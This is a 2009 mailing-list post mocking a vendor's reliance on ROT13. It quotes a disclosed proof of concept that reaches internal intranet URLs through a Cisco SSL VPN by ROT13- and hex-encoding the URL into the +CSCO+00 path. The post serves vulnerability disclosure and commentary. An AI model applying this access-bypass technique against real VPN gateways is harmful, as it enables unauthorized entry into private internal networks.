[VIM] it's 2009, vendor's really think ROT13 is good?

security curmudgeon jericho at attrition.org
Fri Dec 18 04:23:46 UTC 2009


http://archives.neohapsis.com/archives/fulldisclosure/2009-12/0385.html

IV. PROOF OF CONCEPT
-------------------------
Using URL http://intranet published on internal server (not accessible
from home page):
1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL:
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++


More information about the VIM mailing list